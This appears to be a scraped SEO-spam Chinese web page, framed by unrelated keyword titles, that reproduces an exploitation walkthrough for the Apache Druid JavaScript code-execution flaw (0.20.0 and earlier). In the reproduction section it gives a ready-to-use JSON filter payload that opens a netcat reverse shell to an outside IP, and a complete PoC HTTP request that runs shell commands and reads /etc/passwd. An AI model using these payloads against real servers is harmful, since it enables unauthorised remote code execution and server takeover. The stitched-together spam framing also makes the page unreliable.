当前位置: 首页 > news >正文

中关村手机之家报价河南靠谱seo电话

中关村手机之家报价,河南靠谱seo电话,做网站简单还是做app简单,住房建设局网站漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 
http://www.bjxfkj.com.cn/article/106837.html

相关文章:

  • wordpress教程网视频seo外链购买
  • 郑州做网站的公司哪些注册城乡规划师好考吗
  • 兰州网站制作免费推广工具
  • 网页设计 网站建设啥意思中国十大门户网站排行
  • 做b2c网站还是平台免费个人网站制作
  • 做网站答辩广州网站定制多少钱
  • 阿里云服务器做网站安全吗全网关键词搜索排行
  • 做网站如何添加视频查找网站
  • 雷山网站建设东莞优化怎么做seo
  • 主机wordpress成都网站优化seo
  • 平台建设上线网站网站是怎么建立起来的
  • 广告企业网站源码网站建设哪家公司好
  • 网站商场模板bt蚂蚁磁力
  • 运城建设厅官方网站网站媒体推广
  • 网站应该如何推广关键词林俊杰的寓意
  • 鹰潭做网站网站推广优化排名教程
  • 购物网站开发计划书推广文案范例
  • 如何做视频类网站深圳将进一步优化防控措施
  • wordpress 本地数据库关键词优化排名费用
  • 哔哩哔哩推广网站企业推广方法
  • 做网站后期需要什么费用太原网站开发
  • 携程旅行网站建设分析如何建立自己的网站
  • 上海建网站费用优帮云怎么自己做网站推广
  • 怎么快速建动态网站搜狗站长工具
  • 网站广告推送怎么做万江专业网站快速排名
  • 做网站加手机app需要多少钱搜索关键词网站
  • 会做网站开发 但是不会二次开发bt最佳磁力搜索引擎吧
  • wordpress 模版搜索引擎优化关键词
  • 天猫网站做真丝服装批发互联网关键词优化
  • 视频网站开发者工具搜索引擎优化排名品牌